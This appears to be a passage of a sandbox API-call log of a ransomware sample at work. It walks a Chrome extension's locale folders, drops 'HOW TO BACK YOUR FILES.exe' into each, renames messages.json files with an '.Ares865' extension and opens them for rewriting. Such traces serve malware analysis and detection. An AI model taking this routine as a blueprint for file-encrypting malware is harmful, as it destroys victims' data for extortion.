(lpString1="zh_TW", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.171] lstrcmpiW (lpString1="zh_TW", lpString2="aoldtz.exe") returned 1 [0101.172] lstrcpyW (in: lpString1=0x2cce518, lpString2="zh_TW" | out: lpString1="zh_TW") returned="zh_TW" [0101.172] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2760 [0101.172] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x124) returned 0x3375e0 [0101.172] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2768 | out: ListHead=0x2e7710, ListEntry=0x2d2768) returned 0x2d2748 [0101.172] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828836f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e443020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e443020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 0 [0101.172] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0101.172] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2768 [0101.172] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW" [0101.172] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW" [0101.172] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.172] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.173] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.173] GetLastError () returned 0x0 [0101.173] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.173] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828836f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e443020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e443020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.173] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.173] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.173] lstrcpyW (in: lpString1=0x2cce524, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.173] lstrlenW (lpString="messages.json") returned 13 [0101.173] lstrlenW (lpString="Ares865") returned 7 [0101.173] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.174] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.Ares865") returned 167 [0101.174] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.175] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.175] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=640) returned 1 [0101.178] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN" [0101.178] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN" [0101.178] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.178] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.179] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.179] GetLastError () returned 0x0 [0101.179] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.179] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82879ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e443020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e443020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.179] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.180] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.180] lstrcpyW (in: lpString1=0x2cce524, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.180] lstrlenW (lpString="messages.json") returned 13 [0101.180] lstrlenW (lpString="Ares865") returned 7 [0101.180] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.180] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.Ares865") returned 167 [0101.180] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.181] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=595) returned 1 [0101.185] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi" [0101.185] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi" [0101.185] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.185] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.185] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.186] GetLastError () returned 0x0 [0101.186] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82872580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e469180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e469180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.186] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.186] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.186] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.186] lstrlenW (lpString="messages.json") returned 13 [0101.186] lstrlenW (lpString="Ares865") returned 7 [0101.186] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.187] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.Ares865") returned 164 [0101.187] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.188] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.188] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=720) returned 1 [0101.191] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk" [0101.191] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk" [0101.191] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.191] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.192] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.192] GetLastError () returned 0x0 [0101.192] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.192] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8286b050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e469180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e469180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.192] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.192] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.193] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.193] lstrlenW (lpString="messages.json") returned 13 [0101.193] lstrlenW (lpString="Ares865") returned 7 [0101.193] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.193] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.Ares865") returned 164 [0101.193] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.194] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.194] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=789) returned 1 [0101.198] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr" [0101.198] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr" [0101.198] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.198] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.199] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.199] GetLastError () returned 0x0 [0101.199] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.199] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82863b20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e469180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e469180, 